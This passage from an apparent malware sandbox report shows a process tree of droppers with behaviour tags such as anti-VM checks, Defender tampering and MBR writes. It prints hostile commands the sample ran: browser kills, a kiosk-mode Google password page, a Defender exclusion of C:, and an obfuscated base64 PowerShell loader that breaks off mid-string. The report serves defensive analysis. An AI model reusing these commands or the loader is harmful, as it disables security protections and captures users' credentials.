                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:3924
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413350101\b7dce23911.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413350101\b7dce23911.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:4920
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413350101\b7dce23911.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Downloads MZ/PE file
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:980
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413360101\5294be9957.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413360101\5294be9957.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:5604
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413360101\5294be9957.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Downloads MZ/PE file
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:6020
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413370101\5cbc9170b0.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413370101\5cbc9170b0.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:5176
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413380101\00ab26c47d.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413380101\00ab26c47d.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Downloads MZ/PE file
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:1540
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\7SgPWYqN2Xjt.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\7SgPWYqN2Xjt.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:5248
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\4AAwSXqaogYY.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\4AAwSXqaogYY.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:920
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413390101\db8ef5a41d.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413390101\db8ef5a41d.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:5124
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill /F /IM firefox.exe /T
                                                                                                                                                                              7⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:4432
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill /F /IM chrome.exe /T
                                                                                                                                                                              7⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:5476
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill /F /IM msedge.exe /T
                                                                                                                                                                              7⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:5576
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill /F /IM opera.exe /T
                                                                                                                                                                              7⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:1452
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill /F /IM brave.exe /T
                                                                                                                                                                              7⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:5908
                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:5052
                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:4108
                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1988 -prefsLen 27099 -prefMapHandle 1992 -prefMapSize 270279 -ipcHandle 2080 -initialChannelId {92a9d9de-e883-4071-b605-fbfbae7c02b5} -parentPid 4108 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4108" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:5472
                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2348 -prefsLen 27135 -prefMapHandle 2456 -prefMapSize 270279 -ipcHandle 2484 -initialChannelId {5d2da15b-edab-4bdf-9488-404ad0c9599d} -parentPid 4108 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4108" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      PID:4232
                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3912 -prefsLen 25164 -prefMapHandle 3916 -prefMapSize 270279 -jsInitHandle 3920 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3928 -initialChannelId {0912cbfd-a8c9-494a-859f-2333f9a60b6d} -parentPid 4108 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4108" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      PID:876
                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3912 -prefsLen 27276 -prefMapHandle 3964 -prefMapSize 270279 -ipcHandle 4176 -initialChannelId {f4203a88-8af2-4aeb-938a-49db1b4801dc} -parentPid 4108 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4108" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                                                                      9⤵
                                                                                                                                                                                        PID:2892
                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4424 -prefsLen 34775 -prefMapHandle 4428 -prefMapSize 270279 -jsInitHandle 4432 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4440 -initialChannelId {e8bd2895-636a-4922-a84c-3d2c0c305794} -parentPid 4108 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4108" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        PID:5296
                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4980 -prefsLen 35012 -prefMapHandle 5000 -prefMapSize 270279 -ipcHandle 5004 -initialChannelId {f5d53c32-b745-4428-8c77-330ef581d86d} -parentPid 4108 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4108" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        PID:5636
                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5420 -prefsLen 32952 -prefMapHandle 5424 -prefMapSize 270279 -jsInitHandle 5428 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5432 -initialChannelId {81160e46-4348-46b1-9643-09d45a6dda34} -parentPid 4108 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4108" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        PID:6752
                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5632 -prefsLen 32952 -prefMapHandle 5636 -prefMapSize 270279 -jsInitHandle 5640 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5644 -initialChannelId {ab9c47d0-0233-4551-be81-18072db854de} -parentPid 4108 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4108" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        PID:6768
                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5676 -prefsLen 32952 -prefMapHandle 5664 -prefMapSize 270279 -jsInitHandle 5764 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5840 -initialChannelId {99d21806-360f-4c7d-b1f5-fe1c343a53e2} -parentPid 4108 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4108" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        PID:6780
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10413400101\739c76ed67.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10413400101\739c76ed67.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                  • Modifies Windows Defender TamperProtection settings
                                                                                                                                                                                  • Modifies Windows Defender notification settings
                                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                                  • Windows security modification
                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  PID:3136
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10413410101\YGYZCmt.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10413410101\YGYZCmt.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  PID:6972
                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:880
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  PID:5276
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                  PID:5832
                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                    cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:556
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                                                        8⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        PID:6552
                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                      "C:\Windows\system32\svchost.exe"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Downloads MZ/PE file
                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                      PID:3956
                                                                                                                                                                                      • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                                                                                                                        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                                                                                                                        8⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4760
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                                                                                                        8⤵
                                                                                                                                                                                        • Deletes itself
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4812
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\{16dc4e62-7a69-4f62-a63d-7e898d28f872}\530775a6.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\{16dc4e62-7a69-4f62-a63d-7e898d28f872}\530775a6.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                                                                                                                                          9⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:11164
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{7064b777-d415-49b6-a7ec-3d8b1e2cd997}\a3cdad53.exe
                                                                                                                                                                                            C:/Users/Admin/AppData/Local/Temp/{7064b777-d415-49b6-a7ec-3d8b1e2cd997}/\a3cdad53.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                                                                                                                                            10⤵
                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                            • Sets service image path in registry
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Impair Defenses: Safe Mode Boot
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                            • Writes to the Master Boot Record (MBR)
                                                                                                                                                                                            • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            • Suspicious behavior: LoadsDriver
                                                                                                                                                                                            PID:5996
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413440101\qWR3lUj.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413440101\qWR3lUj.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:1996
                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:7184
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413450101\TbV75ZR.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413450101\TbV75ZR.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:8308
                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:8360
                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:8376
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 8376 -s 496
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:8916
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10413461121\5ym0ZYg.cmd"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:9428
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10413461121\5ym0ZYg.cmd"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:9476
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueG